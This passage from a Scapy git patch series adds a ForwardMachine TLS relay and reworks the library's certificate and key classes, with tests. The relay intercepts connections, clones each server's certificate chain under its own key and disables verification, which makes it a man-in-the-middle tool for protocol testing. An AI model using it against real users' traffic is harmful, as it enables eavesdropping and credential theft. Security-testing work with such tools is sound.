the packet is discarded. If it returns a + packet, this packet is forwarded instead of the original packet. + :func xfrmsc: same as xfrmcs for packets forwarded from the 'server' to the + 'client'. + """ + + class MODE(enum.Enum): + SERVER = 0 + TPROXY = 1 + + def __init__( + self, + mode: MODE, + port: int, + cls: Type[Packet], + af: socket.AddressFamily = socket.AF_INET, + proto: socket.SocketKind = socket.SOCK_STREAM, + remote_address: str = None, + remote_af: Optional[socket.AddressFamily] = None, + bind_address: str = None, + tls: bool = False, + crtfile: Optional[str] = None, + keyfile: Optional[str] = None, + timeout: int = 2, + MTU: int = MTU, + **kwargs, + ): + self.mode = mode + self.port = port + self.cls = cls + self.af = af + self.remote_af = remote_af if remote_af is not None else af + self.proto = proto + self.tls = tls + self.crtfile = crtfile + self.keyfile = keyfile + self.timeout = timeout + self.MTU = MTU + self.remote_address = remote_address + if self.tls or self.af == 40: # TLS or VSOCK + self.sockcls = StreamSocketPeekless + else: + self.sockcls = StreamSocket + # Chose 'bind_address' depending on the mode + self.bind_address = bind_address + if self.bind_address is None: + if self.mode == ForwardMachine.MODE.SERVER: + self.bind_address = "0.0.0.0" + elif self.mode == ForwardMachine.MODE.TPROXY: + self.bind_address = "2.2.2.2" + else: + raise ValueError("Unknown mode :/") + red = lambda z: functools.reduce(lambda x, y: x + y, z) + # Utils + self.ct = DefaultTheme() + self.local_ips = red(red(list(x.ips.values())) for x in conf.ifaces.values()) + self.cache = {} + super(ForwardMachine, self).__init__(**kwargs) + + def run(self): + """ + Function to start the relay server + """ + self.ssock = socket.socket(self.af, self.proto, 0) + self.ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + if self.mode == ForwardMachine.MODE.TPROXY: + self.ssock.setsockopt(socket.SOL_IP, socket.IP_TRANSPARENT, 1) # TPROXY ! + self.ssock.bind((self.bind_address, self.port)) + self.ssock.listen(5) + print(self.ct.green("Relay server waiting on port %s" % self.port)) + while True: + conn, addr = self.ssock.accept() + # Calc dest + dest = conn.getsockname() + if self.mode == ForwardMachine.MODE.SERVER or ( + dest[0] in self.local_ips and self.remote_address + ): + dest = (self.remote_address,) + dest[1:] + print(self.ct.green("%s -> %s connected !" % (repr(addr), repr(dest)))) + try: + threading.Thread( + target=self.handler, + args=(conn, addr, dest), + ).start() + except Exception: + print(self.ct.red("%s errored !" % repr(addr))) + conn.close() + pass + + def xfrmcs(self, pkt, ctx): + """ + DEV: overwrite me to handle client->server + """ + raise self.FORWARD() + + def xfrmsc(self, pkt, ctx): + """ + DEV: overwrite me to handle server->client + """ + raise self.FORWARD() + + # Command Exceptions + + class DROP(Exception): + # Drop this packet. + pass + + class FORWARD(Exception): + # Forward this packet. + pass + + class FORWARD_REPLACE(Exception): + # Replace the content and forward. + def __init__(self, data): + self.data = data + + class ANSWER(Exception): + # Answer directly + def __init__(self, data): + self.data = data + + class REDIRECT_TO(Exception): + # Redirect this socket to another destination + def __init__(self, host, port, then=None, server_hostname=None): + self.dest = (host, port) + self.server_hostname = server_hostname + self.then = then or ForwardMachine.FORWARD() + + class CONTEXT: + """ + CONTEXT object kept during a session + """ + + def __init__(self, addr, dest): + self.addr = addr + self.dest = dest + self.tls_sni_name = None # Retrieved when receiving a connection + + def print_reply(self, evt, cs, req, rep): + if evt == self.FORWARD: + if cs: + print("C ==> S: %s" % req.summary()) + else: + print("S ==> C: %s" % req.summary()) + elif evt == self.FORWARD_REPLACE: + if cs: + print("C /=> S: %s -> %s" % (req.summary(), rep.summary())) + else: + print("S /=> C: %s -> %s" % (req.summary(), rep.summary())) + elif evt == self.DROP: + if cs: + print("C => 0: %s" % req.summary()) + else: + print("S => 0: %s" % req.summary()) + elif evt == self.ANSWER: + if cs: + print("C <=| : %s -> %s" % (req.summary(), rep.summary())) + else: + print("S <=| : %s -> %s" % (req.summary(), rep.summary())) + + def destalias(self, dest): + """ + Alias a destination to another destination. + A destination is the tuple (host, port) + """ + return dest + + def _getpeersock(self, dest, server_hostname=None): + """ + Get peer socket + """ + s = socket.socket(self.remote_af, self.proto) + s.settimeout(self.timeout) + ndest = self.destalias(dest) + if ndest != dest: + print("C: %s redirected to %s" % (repr(dest), repr(ndest))) + dest = ndest + s.connect(dest) + return s + + def gen_alike_chain(self, certs, privkey): + """ + Modify a real certificate chain to be served by our own privatekey + """ + c, certs = certs[0], certs[1:] + if certs: + # Recursive: if there are certificates above this one in the chain, do them + # first. + certs = self.gen_alike_chain(certs, privkey) + else: + # Last certificate of the chain. Make it self-signed + c.tbsCertificate.issuer = c.tbsCertificate.subject + # Set SubjectPublicKeyInfo to the one from our private key + c.setSubjectPublicKeyFromPrivateKey(privkey) + # Filter out extensions that would cause trouble + c.tbsCertificate.serialNumber.val = int( + RandInt() + ) # otherwise SEC_ERROR_REUSED_ISSUER_AND_SERIAL + c.tbsCertificate.extensions = [ + x + for x in c.tbsCertificate.extensions + if x.extnID + not in [ + "2.5.29.32", # CPS + "2.5.29.31", # cRLDistributionPoints + "1.3.6.1.5.5.7.1.1", # authorityInfoAccess + "1.3.6.1.4.1.11129.2.4.2", # SCT + "2.5.29.14", # subjectKeyIdentifier + "2.5.29.35", # authorityKeyIdentifier + ] + ] + # For now, we only provide a RSA private key, so we can only sign with that :/ + c.tbsCertificate.signature = X509_AlgorithmIdentifier( + algorithm=ASN1_OID("ecdsa-with-SHA384"), + ) + # Resign. + c = Cert(privkey.resignCert(c)) + # Return + return [c] + certs + + def get_key_and_alike_chain(self, cas, dest, server_name): + """ + Generate a PrivateKey and a clone of the 'cas' certificate chain signed with it, + if not already cached. + + The cache uses server_name or dest as key. + """ + ident = server_name or dest + if ident in self.cache: + return self.cache[ident] + # Parse CAs + certs = [Cert(c.public_bytes()) for c in cas] + # certs = certs[:1] + # Generate Private Key + privkey = PrivKeyECDSA() + # Iterate + certs = self.gen_alike_chain(certs, privkey) + # Build a chain object. This checks that everything is properly signed, and + # re-order the certs. + # chain = Chain(certs, cert0=certs[-1]) + self.cache[ident] = privkey, certs + return privkey, certs + + def handler(self, sock, addr, dest): + """ + Handler of a client socket + """ + ctx = self.CONTEXT(addr, dest) # we have a context object + # Initialize peer socket + ss = self._getpeersock(dest) + # Wrap both server and peer sockets in SSL + if self.tls: + # Build client SSL context + clisslcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + clisslcontext.load_default_certs() + clisslcontext.check_hostname = False + clisslcontext.verify_mode = ssl.CERT_NONE + + # This acts as follows: + # - start the server-side TLS handshake + # - use the SNI callback to pop a client-side socket (using the real + # provided SNI) + # - serve the certificate + + _clisock = [ss] + + def cb_sni(sock, server_name, _): + """ + This callback occurs after the TLSClientHello is received by the server + """ + ss = _clisock[0] + ctx.tls_sni_name = server_name # the requested SNI + # Use that SNI to wrap the client socket + ss = clisslcontext.wrap_socket(ss, server_hostname=server_name) + # Get certificate chain + cas = ss._sslobj.get_unverified_chain() + if self.crtfile is None: + # SELF-SIGNED mode + # Generate private key based on the type of certificate + privkey, certs = self.get_key_and_alike_chain( + cas, dest, server_name + ) + # Load result certificate our SSL server + # (this is dumb but we need to store them on disk) + certfile = get_temp_file() + with open(certfile, "wb") as fd: + for c in certs: + fd.write(c.pem) + keyfile = get_temp_file() + with open(keyfile, "wb") as fd: + password = os.urandom(32) + fd.write( + privkey.key.private_bytes( + encoding=serialization.Encoding.PEM, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.BestAvailableEncryption( # noqa: E501 + password + ), + ) + ) + else: + # Certificate is provided + certfile = self.crtfile + keyfile = self.keyfile + sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + sslcontext.check_hostname = False + sslcontext.verify_mode = ssl.CERT_NONE # note: server side + sslcontext.load_cert_chain(certfile, keyfile, password=password) + sock.context = sslcontext + # Return success + _clisock[0] = ss + return None # Continue + + # Server SSL context + sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + sslcontext.sni_callback = cb_sni + try: + sock = sslcontext.wrap_socket(sock, server_side=True) + except Exception as ex: + print(self.ct.red("%s errored in SSL: %s" % (repr(addr), str(ex)))) + sock.close() + return + ss = _clisock[0] + # Wrap the sockets + sock = self.sockcls(sock, self.cls) + ss = self.sockcls(ss, self.cls) + try: + while True: + # Listen on both ends of the connection + for thissock in select.select([ss, sock], [], [], 0)[0]: + if thissock is ss: + cs = 0 + func = self.xfrmsc + othersock = sock + else: + cs = 1 + func = self.xfrmcs + othersock = ss + # get data + try: + data = thissock.recv(self.MTU) + except EOFError: + raise RuntimeError + if not data: + # Session needs more data + continue + try: + # And pipe everything into the processdata + try: + func(data, ctx) + # If this doesn't raise, it's a user error. + print( + self.ct.red( + "%s ERROR: you must always raise in %s !" % func + ) + ) + return + except self.REDIRECT_TO as ex: + # Replace the peer socket with a new socket + oldss = ss + ss = self._getpeersock( + ex.dest, server_hostname=ex.server_hostname + ) + ss = self.sockcls(ss, self.cls) + print( + "C: %s redirected to %s" + % (repr(ctx.dest), repr(ex.dest)) + ) + ctx.dest = ex.dest # update context + # Shut the old one. + oldss.ins.shutdown(socket.SHUT_RDWR) + oldss.close() + # Replace othersock/thissock + if oldss is thissock: + thissock = ss + else: + othersock = ss + # Raise what's next. + raise ex.then + except self.FORWARD: + # Forward the data to the other host + othersock.send(data) + self.print_reply(self.FORWARD, cs, data, None) + except self.FORWARD_REPLACE as ex: + # Forward custom data to the other host + othersock.send(ex.data) + self.print_reply(self.FORWARD_REPLACE, cs, data, ex.data) + except self.DROP: + # Drop + self.print_reply(self.DROP, cs, data, None) + except self.ANSWER as ex: + # Respond with custom data + thissock.send(ex.data) + self.print_reply(self.ANSWER, cs, data, ex.data) + except Exception as ex: + # Processing failed. forward to not break anything + print( + self.ct.orange( + "Exception happened in handling client %s ! (forward)" + % repr(addr) + ) + ) + traceback.print_exception(ex) + othersock.send(data) + self.print_reply(self.FORWARD, cs, data, None) + except RuntimeError: + print(self.ct.red("%s DISCONNECTED !" % repr(addr))) + sock.close() + ss.close() diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index aa3b03febc8..6b0dc24bfa4 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -10,11 +10,6 @@ Supports both RSA and ECDSA objects. The classes below are wrappers for the ASN.1 objects defined in x509.py. -By collecting their attributes, we bypass the ASN.1 structure, hence -there is no direct method for exporting a new full DER-encoded version -of a Cert instance after its serial has been modified (for example). -If you need to modify an import, just use the corresponding ASN1_Packet. - For instance, here is what you could do in order to modify the serial of 'cert' and then resign it with whatever 'key':: @@ -89,11 +84,11 @@ def der2pem(der_string, obj="UNKNOWN"): """Convert DER octet string to PEM format (with optional header)""" # Encode a byte string in PEM format. Header advertises type. - pem_string = ("-----BEGIN %s-----\n" % obj).encode() - base64_string = base64.b64encode(der_string) + pem_string = "-----BEGIN %s-----\n" % obj + base64_string = base64.b64encode(der_string).decode() chunks = [base64_string[i:i + 64] for i in range(0, len(base64_string), 64)] # noqa: E501 - pem_string += b'\n'.join(chunks) - pem_string += ("\n-----END %s-----\n" % obj).encode() + pem_string += '\n'.join(chunks) + pem_string += "\n-----END %s-----\n" % obj return pem_string @@ -134,16 +129,9 @@ def split_pem(s): class _PKIObj(object): - def __init__(self, frmt, der, pem): - # Note that changing attributes of the _PKIObj does not update these - # values (e.g. modifying k.modulus does not change k.der). - # XXX use __setattr__ for this + def __init__(self, frmt, der): self.frmt = frmt - self.der = der - self.pem = pem - - def __str__(self): - return self.der + self._der = der class _PKIObjMaker(type): @@ -176,20 +164,15 @@ def __call__(cls, obj_path, obj_max_size, pem_marker=None): if b"-----BEGIN" in _raw: frmt = "PEM" pem = _raw - der_list = split_pem(_raw) + der_list = split_pem(pem) der = b''.join(map(pem2der, der_list)) else: frmt = "DER" der = _raw - pem = "" - if pem_marker is not None: - pem = der2pem(_raw, pem_marker) - # type identification may be needed for pem_marker - # in such case, the pem attribute has to be updated except Exception: raise Exception(error_msg) - p = _PKIObj(frmt, der, pem) + p = _PKIObj(frmt, der) return p @@ -207,7 +190,15 @@ class _PubKeyFactory(_PKIObjMaker): It casts the appropriate class on the fly, then fills in the appropriate attributes with import_from_asn1pkt() submethod. """ - def __call__(cls, key_path=None): + def __call__(cls, key_path=None, cryptography_obj=None): + # This allows to import cryptography objects directly + if cryptography_obj is not None: + obj = type.__call__(cls) + obj.__class__ = cls + obj.frmt = "original" + obj.marker = "PUBLIC KEY" + obj.pubkey = cryptography_obj + return obj if key_path is None: obj = type.__call__(cls) @@ -233,41 +224,38 @@ def __call__(cls, key_path=None): # _an EdDSAPublicKey. obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) try: - spki = X509_SubjectPublicKeyInfo(obj.der) + spki = X509_SubjectPublicKeyInfo(obj._der) pubkey = spki.subjectPublicKey if isinstance(pubkey, RSAPublicKey): obj.__class__ = PubKeyRSA obj.import_from_asn1pkt(pubkey) elif isinstance(pubkey, ECDSAPublicKey): obj.__class__ = PubKeyECDSA - obj.import_from_der(obj.der) + obj.import_from_der(obj._der) elif isinstance(pubkey, EdDSAPublicKey): obj.__class__ = PubKeyEdDSA - obj.import_from_der(obj.der) + obj.import_from_der(obj._der) else: raise - marker = b"PUBLIC KEY" + obj.marker = "PUBLIC KEY" except Exception: try: - pubkey = RSAPublicKey(obj.der) + pubkey = RSAPublicKey(obj._der) obj.__class__ = PubKeyRSA obj.import_from_asn1pkt(pubkey) - marker = b"RSA PUBLIC KEY" + obj.marker = "RSA PUBLIC KEY" except Exception: # We cannot import an ECDSA public key without curve knowledge if conf.debug_dissector: raise raise Exception("Unable to import public key") - - if obj.frmt == "DER": - obj.pem = der2pem(obj.der, marker) return obj class PubKey(metaclass=_PubKeyFactory): """ - Parent class for both PubKeyRSA and PubKeyECDSA. - Provides a common verifyCert() method. + Parent class for PubKeyRSA, PubKeyECDSA and PubKeyEdDSA. + Provides common verifyCert() and export() methods. """ def verifyCert(self, cert): @@ -278,6 +266,34 @@ def verifyCert(self, cert): sigVal = raw(cert.signatureValue) return self.verify(raw(tbsCert), sigVal, h=h, t='pkcs') + @property + def pem(self): + return der2pem(self.der, self.marker) + + @property + def der(self): + return self.pubkey.public_bytes( + encoding=serialization.Encoding.DER, + format=serialization.PublicFormat.SubjectPublicKeyInfo, + ) + + def public_numbers(self, *args, **kwargs): + return self.pubkey.public_numbers(*args, **kwargs) + + @property + def key_size(self): + return self.pubkey.key_size + + def export(self, filename, fmt="DER"): + """ + Export public key in 'fmt' format (DER or PEM) to file 'filename' + """ + with open(filename, "wb") as f: + if fmt == "DER": + f.write(self.der) + elif fmt == "PEM": + f.write(self.pem) + class PubKeyRSA(PubKey, _EncryptAndVerifyRSA): """ @@ -308,6 +324,9 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None): warning("modulus and modulusLen do not match!") pubNum = rsa.RSAPublicNumbers(n=modulus, e=pubExp) self.pubkey = pubNum.public_key(default_backend()) + + self.marker = "PUBLIC KEY" + # Lines below are only useful for the legacy part of pkcs1.py pubNum = self.pubkey.public_numbers() self._modulusLen = real_modulusLen @@ -323,10 +342,6 @@ def import_from_tuple(self, tup): if isinstance(e, bytes): e = pkcs_os2ip(e) self.fill_and_store(modulus=m, pubExp=e) - self.pem = self.pubkey.public_bytes( - encoding=serialization.Encoding.PEM, - format=serialization.PublicFormat.SubjectPublicKeyInfo) - self.der = pem2der(self.pem) def import_from_asn1pkt(self, pubkey): modulus = pubkey.modulus.val @@ -433,47 +448,38 @@ def __call__(cls, key_path=None): return obj obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) - multiPEM = False try: - privkey = RSAPrivateKey_OpenSSL(obj.der) + privkey = RSAPrivateKey_OpenSSL(obj._der) privkey = privkey.privateKey obj.__class__ = PrivKeyRSA - marker = b"PRIVATE KEY" + obj.marker = "PRIVATE KEY" except Exception: try: - privkey = ECDSAPrivateKey_OpenSSL(obj.der) + privkey = ECDSAPrivateKey_OpenSSL(obj._der) privkey = privkey.privateKey obj.__class__ = PrivKeyECDSA - marker = b"EC PRIVATE KEY" - multiPEM = True + obj.marker = "EC PRIVATE KEY" except Exception: try: - privkey = RSAPrivateKey(obj.der) + privkey = RSAPrivateKey(obj._der) obj.__class__ = PrivKeyRSA - marker = b"RSA PRIVATE KEY" + obj.marker = "RSA PRIVATE KEY" except Exception: try: - privkey = ECDSAPrivateKey(obj.der) + privkey = ECDSAPrivateKey(obj._der) obj.__class__ = PrivKeyECDSA - marker = b"EC PRIVATE KEY" + obj.marker = "EC PRIVATE KEY" except Exception: try: - privkey = EdDSAPrivateKey(obj.der) + privkey = EdDSAPrivateKey(obj._der) obj.__class__ = PrivKeyEdDSA - marker = b"PRIVATE KEY" + obj.marker = "PRIVATE KEY" except Exception: raise Exception("Unable to import private key") try: obj.import_from_asn1pkt(privkey) except ImportError: pass - - if obj.frmt == "DER": - if multiPEM: - # this does not restore the EC PARAMETERS header - obj.pem = der2pem(raw(privkey), marker) - else: - obj.pem = der2pem(obj.der, marker) return obj @@ -486,8 +492,9 @@ def __bytes__(self): class PrivKey(metaclass=_PrivKeyFactory): """ - Parent class for both PrivKeyRSA and PrivKeyECDSA. - Provides common signTBSCert() and resignCert() methods. + Parent class for PrivKeyRSA, PrivKeyECDSA and PrivKeyEdDSA. + Provides common signTBSCert(), resignCert(), verifyCert() + and export() methods. """ def signTBSCert(self, tbsCert, h="sha256"): @@ -525,8 +532,30 @@ def verifyCert(self, cert): sigVal = raw(cert.signatureValue) return self.verify(raw(tbsCert), sigVal, h=h, t='pkcs') + @property + def pem(self): + return der2pem(self.der, self.marker) + + @property + def der(self): + return self.key.private_bytes( + encoding=serialization.Encoding.DER, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.NoEncryption() + ) -class PrivKeyRSA(PrivKey, _EncryptAndVerifyRSA, _DecryptAndSignRSA): + def export(self, filename, fmt="DER"): + """ + Export private key in 'fmt' format (DER or PEM) to file 'filename' + """ + with open(filename, "wb") as f: + if fmt == "DER": + f.write(self.der) + elif fmt == "PEM": + f.write(self.pem) + + +class PrivKeyRSA(PrivKey, _DecryptAndSignRSA): """ Wrapper for RSA keys based on _DecryptAndSignRSA from crypto/pkcs1.py Use the 'key' attribute to access original object. @@ -554,7 +583,7 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None, key_size=real_modulusLen, backend=default_backend(), ) - self.pubkey = self.key.public_key() + pubkey = self.key.public_key() else: real_modulusLen = len(binrepr(modulus)) if modulusLen and real_modulusLen != modulusLen: @@ -565,14 +594,18 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None, iqmp=coefficient, d=privExp, public_numbers=pubNum) self.key = privNum.private_key(default_backend()) - self.pubkey = self.key.public_key() + pubkey = self.key.public_key() + + self.marker = "PRIVATE KEY" # Lines below are only useful for the legacy part of pkcs1.py - pubNum = self.pubkey.public_numbers() + pubNum = pubkey.public_numbers() self._modulusLen = real_modulusLen self._modulus = pubNum.n self._pubExp = pubNum.e + self.pubkey = PubKeyRSA((pubNum.e, pubNum.n, real_modulusLen)) + def import_from_asn1pkt(self, privkey): modulus = privkey.modulus.val pubExp = privkey.publicExponent.val @@ -588,9 +621,14 @@ def import_from_asn1pkt(self, privkey): coefficient=coefficient) def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): - # Let's copy this from PubKeyRSA instead of adding another baseclass :) - return _EncryptAndVerifyRSA.verify( - self, msg, sig, t=t, h=h, mgf=mgf, L=L) + return self.pubkey.verify( + msg=msg, + sig=sig, + t=t, + h=h, + mgf=mgf, + L=L, + ) def sign(self, data, t="pkcs", h="sha256", mgf=None, L=None): return _DecryptAndSignRSA.sign(self, data, t=t, h=h, mgf=mgf, L=L) @@ -605,22 +643,19 @@ class PrivKeyECDSA(PrivKey): def fill_and_store(self, curve=None): curve = curve or ec.SECP256R1 self.key = ec.generate_private_key(curve(), default_backend()) - self.pubkey = self.key.public_key() + self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) + self.marker = "EC PRIVATE KEY" @crypto_validator def import_from_asn1pkt(self, privkey): self.key = serialization.load_der_private_key(raw(privkey), None, backend=default_backend()) # noqa: E501 - self.pubkey = self.key.public_key() + self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) + self.marker = "EC PRIVATE KEY" @crypto_validator def verify(self, msg, sig, h="sha256", **kwargs): - # 'sig' should be a DER-encoded signature, as per RFC 3279 - try: - self.pubkey.verify(sig, msg, ec.ECDSA(_get_hash(h))) - return True - except InvalidSignature: - return False + return self.pubkey.verify(msg=msg, sig=sig, h=h, **kwargs) @crypto_validator def sign(self, data, h="sha256", **kwargs): @@ -636,22 +671,19 @@ class PrivKeyEdDSA(PrivKey): def fill_and_store(self, curve=None): curve = curve or x25519.X25519PrivateKey self.key = curve.generate() - self.pubkey = self.key.public_key() + self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) + self.marker = "PRIVATE KEY" @crypto_validator def import_from_asn1pkt(self, privkey): self.key = serialization.load_der_private_key(raw(privkey), None, backend=default_backend()) # noqa: E501 - self.pubkey = self.key.public_key() + self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) + self.marker = "PRIVATE KEY" @crypto_validator def verify(self, msg, sig, **kwargs): - # 'sig' should be a DER-encoded signature, as per RFC 3279 - try: - self.pubkey.verify(sig, msg) - return True - except InvalidSignature: - return False + return self.pubkey.verify(msg=msg, sig=sig, **kwargs) @crypto_validator def sign(self, data, **kwargs): @@ -671,8 +703,9 @@ def __call__(cls, cert_path): obj = _PKIObjMaker.__call__(cls, cert_path, _MAX_CERT_SIZE, "CERTIFICATE") obj.__class__ = Cert + obj.marker = "CERTIFICATE" try: - cert = X509_Cert(obj.der) + cert = X509_Cert(obj._der) except Exception: if conf.debug_dissector: raise @@ -777,6 +810,22 @@ def getSignatureHash(self): h = hash_by_oid[sigAlg.algorithm.val] return _get_hash(h) + def setSubjectPublicKeyFromPrivateKey(self, key): + """ + Replace the subjectPublicKeyInfo of this certificate with the one from + the provided key. + """ + if isinstance(key, (PubKey, PrivKey)): + if isinstance(key, PrivKey): + pubkey = key.pubkey + else: + pubkey = key + self.tbsCertificate.subjectPublicKeyInfo = X509_SubjectPublicKeyInfo( + pubkey.der + ) + else: + raise ValueError("Unknown type 'key', should be PubKey or PrivKey") + def remainingDays(self, now=None): """ Based on the value of notAfter field, returns the number of @@ -839,6 +888,14 @@ def isRevoked(self, crl_list): return self.serial in (x[0] for x in c.revoked_cert_serials) return False + @property + def pem(self): + return der2pem(self.der, self.marker) + + @property + def der(self): + return bytes(self.x509Cert) + def export(self, filename, fmt="DER"): """ Export certificate in 'fmt' format (DER or PEM) to file 'filename' @@ -872,7 +929,7 @@ def __call__(cls, cert_path): obj = _PKIObjMaker.__call__(cls, cert_path, _MAX_CRL_SIZE, "X509 CRL") obj.__class__ = CRL try: - crl = X509_CRL(obj.der) + crl = X509_CRL(obj._der) except Exception: raise Exception("Unable to import CRL") obj.import_from_asn1pkt(crl) diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index d9ddda437a6..03692ffdccb 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -333,9 +333,9 @@ def get_usable_tls13_sigalgs(li, key, location="certificateverify"): elif isinstance(key, PrivKeyECDSA): kx = "ecdsa" elif isinstance(key, PrivKeyEdDSA): - if isinstance(key.pubkey, ed25519.Ed25519PublicKey): + if isinstance(key.pubkey.pubkey, ed25519.Ed25519PublicKey): kx = "ed25519" - elif isinstance(key.pubkey, ed448.Ed448PublicKey): + elif isinstance(key.pubkey.pubkey, ed448.Ed448PublicKey): kx = "ed448" else: kx = "unknown" diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 9744fd841bf..5ffd7a30f63 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -502,16 +502,14 @@ def recv(self, x=None, **kwargs): return pkt -class SSLStreamSocket(StreamSocket): - desc = "similar usage than StreamSocket but specialized for handling SSL-wrapped sockets" # noqa: E501 - - # Basically StreamSocket but we can't PEEK +class StreamSocketPeekless(StreamSocket): + desc = "StreamSocket that doesn't use MSG_PEEK" def __init__(self, sock, basecls=None): # type: (socket.socket, Optional[Type[Packet]]) -> None from scapy.sessions import TCPSession self.sess = TCPSession(app=True) - super(SSLStreamSocket, self).__init__(sock, basecls) + super(StreamSocketPeekless, self).__init__(sock, basecls) # 65535, the default value of x is the maximum length of a TLS record def recv(self, x=None, **kwargs): @@ -540,11 +538,18 @@ def select(sockets, remain=None): queued = [ x for x in sockets - if isinstance(x, SSLStreamSocket) and x.sess.data + if isinstance(x, StreamSocketPeekless) and x.sess.data ] if queued: return queued # type: ignore - return super(SSLStreamSocket, SSLStreamSocket).select(sockets, remain=remain) + return super(StreamSocketPeekless, StreamSocketPeekless).select( + sockets, + remain=remain, + ) + + +# Old name: SSLStreamSocket +SSLStreamSocket = StreamSocketPeekless class L2ListenTcpdump(SuperSocket): diff --git a/test/scapy/layers/tls/cert.uts b/test/scapy/layers/tls/cert.uts index ceeeeb719bf..f0a258e4db4 100644 --- a/test/scapy/layers/tls/cert.uts +++ b/test/scapy/layers/tls/cert.uts @@ -150,8 +150,9 @@ assert not a.verify(b"Hello", data) = PubKeyECDSA verify ~ crypto_advanced -b = PubKeyECDSA() -b.pubkey = a.pubkey +assert isinstance(a.pubkey, PubKeyECDSA) + +b = PubKeyECDSA(cryptography_obj=a.pubkey.pubkey) assert b.verify(msg, data) assert not b.verify(b"Hello", data) @@ -400,7 +401,7 @@ with ContextManagerCaptureOutput() as cmco: y.show() assert cmco.get_output().strip() == awaited.strip() -= Cert: Check split_pem on chained certs with missing end \n += Cert class : Check split_pem on chained certs with missing end \n from scapy.layers.tls.cert import split_pem ks = split_pem(b""" -----BEGIN EC PRIVATE KEY----- @@ -415,7 +416,7 @@ weDU+RsFxcyU/QxD9WYORzYarqxbcA== -----END EC PRIVATE KEY-----""") assert ks[0][:-1] == ks[1] -= Import PEM-encoded certificate with ed25519 signature += Cert class : Import PEM-encoded certificate with ed25519 signature x = Cert(""" -----BEGIN CERTIFICATE----- MIICqDCCAZCgAwIBAgIUYYDvh160/Q32Q/MuCGSfIYxTwwEwDQYJKoZIhvcNAQEL @@ -436,6 +437,30 @@ XwZH9DJ6Ud0s8/j+ -----END CERTIFICATE----- """) += Cert class : Change subject public key identifier and resign +c = Cert(""" +-----BEGIN CERTIFICATE----- +MIICRjCCAc2gAwIBAgIQC6Fa+h3foLVJRK/NJKBs7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu +ZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3Qg +RzMwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQGEwJV +UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu +Y29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzMwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAAQZ57ysRGXtzbg/WPuNsVepRC0FFfLvC/8QdJ+1YlJf +Zn4f5dwbRXkLzMZTCp2NXQLZqVneAlr2lSoOjThKiknGvMYDOAdfVdp+CW7if17Q +RSAPWXYQ1qAk8C3eNvJsKTmjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgGGMB0GA1UdDgQWBBTL0L2p4ZgFUaFNN6KDec6NHSrkhDAKBggqhkjOPQQD +AwNnADBkAjAlpIFFAmsSS3V0T8gj43DydXLefInwz5FyYZ5eEJJZVrmDxxDnOOlY +JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv +6pZjamVFkpUBtA== +-----END CERTIFICATE----- +""") +k = PrivKeyECDSA() +c.setSubjectPublicKeyFromPrivateKey(k) +c.setSubjectPublicKeyFromPrivateKey(k.pubkey) +c = Cert(k.resignCert(c)) + +assert k.verifyCert(c) ########### CRL class ############################################### diff --git a/tox.ini b/tox.ini index 62639d16d3f..d47bddf8b9d 100644 --- a/tox.ini +++ b/tox.ini @@ -122,10 +122,9 @@ commands = # Debug mode [testenv:docs2] description = "Build the docs without rebuilding the API tree" -skip_install = true +extras = doc changedir = {toxinidir}/doc/scapy deps = {[testenv:docs]deps} -allowlist_externals = sphinx-build setenv = SCAPY_APITREE = 0 commands = From 42fa1c27b47cb2a1b18149aca902983c858181cf Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 7 Jul 2025 15:18:31 +0200 Subject: [PATCH 1501/1632] DCE/RPC: fix length_is bug (#4785) --- scapy/layers/dcerpc.py | 18 +++++++++++------- test/scapy/layers/dcerpc.uts | 29 +++++++++++++++++++++++++++++ 2 files changed, 40 insertions(+), 7 deletions(-) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 0b89c7456b5..6110fe1273c 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1988,9 +1988,15 @@ class _NDRVarField: COUNT_FROM = False def __init__(self, *args, **kwargs): - # size is either from the length_is, if specified, or the "actual_count" - self.from_actual = "length_is" not in kwargs - length_is = kwargs.pop("length_is", lambda pkt: pkt.actual_count) + # We build the length_is function by taking into account both the + # actual_count (from the varying field) and a potentially provided + # length_is field. + if "length_is" in kwargs: + _length_is = 